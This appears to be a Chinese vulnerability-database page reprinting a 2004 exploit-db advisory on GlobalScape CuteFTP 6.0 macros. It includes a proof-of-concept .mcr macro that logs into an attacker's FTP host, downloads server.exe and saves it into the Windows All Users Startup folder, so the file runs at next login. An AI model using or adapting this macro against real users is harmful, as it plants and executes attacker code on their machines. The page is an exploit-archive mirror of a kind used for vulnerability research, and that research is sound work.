GlobalScape – CuteFTP macros ‘.mcr’ Local File Write

20次阅读
没有评论

GlobalScape – CuteFTP macros ‘.mcr’ Local File Write

漏洞ID 1054699 漏洞类型
发布时间 2004-09-28 更新时间 2004-09-28
GlobalScape - CuteFTP macros '.mcr' Local File WriteCVE编号 N/A
 		GlobalScape - CuteFTP macros '.mcr' Local File WriteCNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/560
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Application:  GlobalSCAPE CuteFTP V6.0
             http://www.globalscape.com/

Risk:         Medium

/*
e-mail: [email protected]
web: http://www.prohack.net
*/

--The bug:

Atacker can create a crafted CuteFTP macro (*.mcr),
and when its loaded in the target computer, it can download the Arbitrary file
into the target users startup folder.

----example *.mcr macro----

Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:Documents and SettingsAll UsersStart MenuProgramsStartup


# milw0rm.com [2004-09-28]

相关推荐: NAI PGP Keyserver Web Administration Interface Authentication Bypassing Vulnerability

NAI PGP Keyserver Web Administration Interface Authentication Bypassing Vulnerability 漏洞ID 1102900 漏洞类型 Configuration Error 发布时间 2…

正文完
cuteftp globalscape 漏洞
发表至: 网络安全漏洞
2021年4月9日
 0
文章搜索
热门文章
随机文章